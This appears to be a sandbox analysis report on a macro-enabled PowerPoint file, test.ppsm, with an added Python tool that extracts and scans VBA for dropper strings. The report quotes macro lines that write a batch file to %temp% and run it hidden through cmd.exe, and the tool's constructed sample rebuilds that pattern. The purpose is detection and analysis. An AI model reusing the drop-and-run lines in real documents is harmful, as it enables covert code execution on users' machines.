Analysis Report test.ppsm

Overview

General Information

Sample Name:test.ppsm
Analysis ID:428845
MD5:99a4963b54d93b286ff5de714c7f5010
SHA1:66fb2a56df63e96af7b43b843a918370a8763147
SHA256:61af0a3d3d4d9b0a52b94b96830adc7bbe000f626c02c8914b001c155e90d9da

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings

Process Tree

  • System is w7x64
  • POWERPNT.EXE (PID: 1948 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cleanup

Only POWERPNT.EXE appears in the tree: no cmd.exe child process was recorded. The "may execute processes" verdict therefore rests on the macro source recovered from the OLE container (see Signature Overview), not on observed execution, which is also consistent with no Sigma rule matching.

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\550AD343.png

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: test.ppsm, OLE, VBA macro line: wsh.Run "cmd.exe /c %temp%\art1204.bat", vbMinimizedNoFocus
Document contains an embedded VBA macro with suspicious strings
Source: test.ppsm, OLE, VBA macro line: Dim wsh As Object: Set wsh = VBA.CreateObject("WScript.Shell")
Source: test.ppsm, OLE, VBA macro line: Open Environ("temp") & "\art1204.bat" For Output As #1
Source: test.ppsm, OLE, VBA macro line: wsh.Run "cmd.exe /c %temp%\art1204.bat", vbMinimizedNoFocus
Source: VBA code instrumentation, OLE, VBA macro: Module Module1, Function Malicious_File, String wscript: Set wsh = VBA.CreateObject("WScript.Shell") (Name: Malicious_File)
Source: VBA code instrumentation, OLE, VBA macro: Module Module1, Function Malicious_File, String environ: Open Environ("temp") & "\art1204.bat" For Output As # 1 (Name: Malicious_File)
Source: VBA code instrumentation, OLE, VBA macro: Module Module1, Function Malicious_File, String cmd.exe: wsh.Run "cmd.exe /c %temp%\art1204.bat", vbMinimizedNoFocus (Name: Malicious_File)
Read together, the three macro lines form a dropper: Malicious_File creates a WScript.Shell object, writes a batch file named art1204.bat into %temp%, and then runs it through cmd.exe /c in a minimized window that does not take focus.
Source: classification engine, Classification label: mal48.expl.winPPSM@1/11@0/0
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, File created: C:\Users\user\Desktop\~$test.ppsm
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmp
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, File read: C:\Users\desktop.ini
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Source: test.ppsm, Static file information: File size 4802837 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, Process information set: NOOPENFILEERRORBOX (17 identical entries)
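What the two macro signatures above are looking at, as an added example that is not Joe Sandbox code and not the analysed file's own macro: a Python script that locates the MS-OVBA-compressed module streams inside a .ppsm's vbaProject.bin by the "\x00Attribut" marker (a zero flag byte followed by the first eight literals of "Attribute VB_Name"), decompresses them without parsing the OLE2 container, and runs the report's three string checks over the recovered source. The marker heuristic and the vbaProject.bin path are this example's assumptions; SAMPLE_VBA reproduces the three quoted lines and the Module1/Malicious_File names with a constructed Print/Close body, and build_sample_ppsm() wraps it in a minimal zip so the script runs offline.

```python
# Added example, not Joe Sandbox code and not the analysed file's own macro.
# Assumptions: the package keeps its project at a path ending in vbaProject.bin,
# and every module stream starts with "Attribute VB_Name", so the bytes
# 00 "Attribut" sit three bytes after the 0x01 signature byte of an MS-OVBA
# CompressedContainer. SAMPLE_VBA is constructed test data.
import io
import re
import zipfile

def decompress(data, start=0):
    """MS-OVBA 2.4.1 decompression of the container at data[start:]; stops at
    the first 16-bit word without the 0b011 chunk signature (no length needed)."""
    if data[start] != 0x01:
        raise ValueError("no CompressedContainer signature byte")
    pos, out = start + 1, bytearray()
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        if (header >> 12) & 0x7 != 0b011:
            break
        chunk_end = pos + (header & 0x0FFF) + 3        # size field = bytes - 3
        compressed, pos, base = bool(header & 0x8000), pos + 2, len(out)
        if not compressed:                             # raw 4096-byte chunk
            out += data[pos:chunk_end]
        while compressed and pos < chunk_end and len(out) - base < 4096:
            flags, pos = data[pos], pos + 1
            for bit in range(8):                       # one flag bit per token
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:             # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = int.from_bytes(data[pos:pos + 2], "little")
                pos, cur = pos + 2, len(out) - base
                bits = max((cur - 1).bit_length(), 4)  # ceil(log2(cur)), min 4
                length = (token & (0xFFFF >> bits)) + 3
                offset = (token >> (16 - bits)) + 1
                if offset > cur:
                    raise ValueError("copy token points before chunk start")
                for _ in range(length):                # may overlap its own output
                    out.append(out[-offset])
        pos = chunk_end
    return bytes(out)

def find_vba_modules(blob):
    """Decompress every module source container found in a raw vbaProject.bin."""
    modules = []
    for m in re.finditer(rb"\x00Attribut", blob):
        start = m.start() - 3
        if start >= 0 and blob[start] == 0x01:
            try:
                modules.append(decompress(blob, start))
            except (ValueError, IndexError):
                pass                                   # false hit or truncated
    return modules

def extract_vba_from_ooxml(package):
    """package: bytes of a .ppsm/.pptm/.docm/.xlsm; returns module sources."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        bins = [z.read(n) for n in z.namelist() if n.lower().endswith("vbaproject.bin")]
    return [mod for b in bins for mod in find_vba_modules(b)]

# The three strings the report flagged, generalised to regexes.
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "writes_temp_file": re.compile(r'\bOpen\b.*Environ\s*\(\s*"temp"\s*\).*\bFor\s+Output\b', re.I),
    "runs_cmd": re.compile(r'\.Run\s+"cmd(\.exe)?\b', re.I),
}

def scan_vba(source):
    """Return {indicator: [(line_no, line), ...]} plus a drop-and-run verdict."""
    hits = {name: [] for name in INDICATORS}
    for no, line in enumerate(source.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits[name].append((no, line.strip()))
    # Each string alone is weak; writing into %temp% and then handing that path
    # to cmd.exe is the dropper pattern behind the report's two signatures.
    hits["drops_and_runs"] = bool(hits["writes_temp_file"] and hits["runs_cmd"])
    return hits

def compress_literal_only(src):
    """Valid container using literal tokens only (real encoders also emit LZ77
    copy tokens); 3640-byte chunks keep 2 + n + n/8 inside the 12-bit size field."""
    out = bytearray(b"\x01")
    for i in range(0, len(src), 3640):
        body = b"".join(b"\x00" + src[j:j + 8] for j in range(i, min(i + 3640, len(src)), 8))
        out += (0xB000 | (len(body) - 1)).to_bytes(2, "little") + body
    return bytes(out)

# Constructed module: the three flagged lines and the module/function names come
# from the report; the Print/Close lines are placeholders.
SAMPLE_VBA = (
    b'Attribute VB_Name = "Module1"\r\n'
    b'Function Malicious_File()\r\n'
    b'    Dim wsh As Object: Set wsh = VBA.CreateObject("WScript.Shell")\r\n'
    b'    Open Environ("temp") & "\\art1204.bat" For Output As #1\r\n'
    b'    Print #1, "echo constructed placeholder"\r\n'
    b'    Close #1\r\n'
    b'    wsh.Run "cmd.exe /c %temp%\\art1204.bat", vbMinimizedNoFocus\r\n'
    b'End Function\r\n'
)

def build_sample_ppsm():
    """Minimal OOXML-style zip whose vbaProject.bin is zero filler around one container."""
    vba_bin = b"\xd0\xcf\x11\xe0" + b"\x00" * 60 + compress_literal_only(SAMPLE_VBA) + b"\x00" * 32
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/vbaProject.bin", vba_bin)
    return buf.getvalue()
```

Calling scan_vba on each module returned by extract_vba_from_ooxml(build_sample_ppsm()) reports hits for all three indicators (lines 3, 4 and 7 of the constructed sample) and sets drops_and_runs to True; passing the bytes of a real .ppsm to extract_vba_from_ooxml works the same way. The marker search is a shortcut: a full tool parses the OLE2 directory and the compressed dir stream instead, which also yields module names and text offsets, but for triage the three bytes before "\x00Attribut" get to the same source.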

Mitre Att&ck Matrix

Each tactic column of the matrix is listed with its cells. A number in parentheses is the count of signatures mapped to that technique; cells without a count are the matrix's placeholder entries and carry no match for this sample.

  • Initial Access: Valid Accounts, Default Accounts
  • Execution: Scripting (2), Scheduled Task/Job
  • Persistence: Path Interception, Boot or Logon Initialization Scripts
  • Privilege Escalation: Path Interception, Boot or Logon Initialization Scripts
  • Defense Evasion: Masquerading (1), Scripting (2)
  • Credential Access: OS Credential Dumping, LSASS Memory
  • Discovery: File and Directory Discovery (1), System Information Discovery (1)
  • Lateral Movement: Remote Services, Remote Desktop Protocol
  • Collection: Data from Local System, Data from Removable Media
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth
  • Command and Control: Ingress Tool Transfer (1), Junk Data
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization
  • Impact: Modify System Partition, Device Lockout

Behavior Graph

[Behavior graph image. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet]